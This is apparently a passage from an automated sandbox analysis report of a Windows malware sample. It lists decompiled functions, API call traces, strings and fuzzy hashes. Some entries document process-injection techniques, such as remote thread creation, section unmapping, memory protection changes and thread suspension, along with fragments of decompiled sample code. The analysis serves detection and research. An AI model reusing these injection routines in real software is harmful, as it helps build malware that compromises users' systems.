							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring

Similarity

Total matches: 5
API ID: VirtualAllocVirtualFreelstrcpynmemcpy
String ID: Apr 14 2018$pnls$pnls
API String ID: 1980370899-1480254790
Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f

APIs

lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106

Strings

pnls, xrefs: 002E40DF
pnls, xrefs: 002E40DA
Apr 14 2018, xrefs: 002E4083

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
CloseHandle.KERNEL32 ref: 002E1141
HeapDestroy.KERNEL32 ref: 002E114E

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Similarity

Total matches: 190
API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
String ID: \\.\mailslot\msl0
API String ID: 2393858888-622273203
Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395

C-Code - Quality: 96%

			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs

CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
GetLastError.KERNEL32 ref: 004010D6

Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE

ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
GetLastError.KERNEL32 ref: 004010A4
Sleep.KERNELBASE(00000064), ref: 004010B7
CloseHandle.KERNEL32(?), ref: 004010CE

Strings

\\.\mailslot\msl0, xrefs: 00401047

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Similarity

Total matches: 194
API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
String ID:
API String ID: 1233022807-0
Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca

APIs

CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
GetLastError.KERNEL32(?,002E7494), ref: 002E16F3

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Similarity

Total matches: 307
API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 307323562-0
Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed

APIs

memset.NTDLL ref: 002E22F5

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

ResumeThread.KERNELBASE(?), ref: 002E2418

Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81

ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
SuspendThread.KERNELBASE(?), ref: 002E23A1

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Similarity

Total matches: 154
API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
String ID:
API String ID: 2418253885-0
Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65

APIs

Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331

OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
